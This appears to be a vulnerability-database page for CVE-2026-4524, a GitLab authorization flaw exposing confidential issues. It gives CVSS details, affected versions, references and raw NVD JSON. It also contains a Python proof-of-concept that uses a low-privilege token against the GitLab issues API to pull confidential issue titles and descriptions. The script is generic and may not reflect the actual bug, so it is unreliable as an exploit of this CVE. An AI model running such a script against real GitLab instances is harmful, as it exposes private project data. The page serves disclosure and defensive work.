CVE-2026-4524

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to access confidential issue content in public projects without proper authorization due to improper authorization checks.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GitLab CE/EE 18.9.1 至 18.9.6

GitLab CE/EE 18.10.0 至 18.10.5

GitLab CE/EE 18.11.0 至 18.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-4524 Proof of Concept
# Description: Access confidential issue in public project without proper authorization.

# Target configuration
target_domain = "https://gitlab.example.com"
project_id = "123"
confidential_issue_id = "456"

# Valid authentication token for a low-privilege user
# The attacker does not need to be a member of the project
access_token = "glpat-xxxxxxxxxxxxxxxxxxxx"

url = f"{target_domain}/api/v4/projects/{project_id}/issues/{confidential_issue_id}"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"[+] Attempting to access confidential issue {confidential_issue_id}...")

try:
    response = requests.get(url, headers=headers)

    if response.status_code == 200:
        data = response.json()
        if data.get('confidential'):
            print("[!] SUCCESS: Confidential issue accessed successfully!")
            print(f"Title: {data.get('title')}")
            print(f"Description: {data.get('description')}")
        else:
            print("[-] Issue accessed but is not marked as confidential.")
    else:
        print(f"[-] Failed to access issue. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4524/
[4] VulDB https://vuldb.com/cve/CVE-2026-4524
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/594295
[7] https://hackerone.com/reports/3597717

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4524", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:23.677", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to access confidential issue content in public projects without proper authorization due to improper authorization checks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/594295", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3597717", "source": "[email protected]"}]}}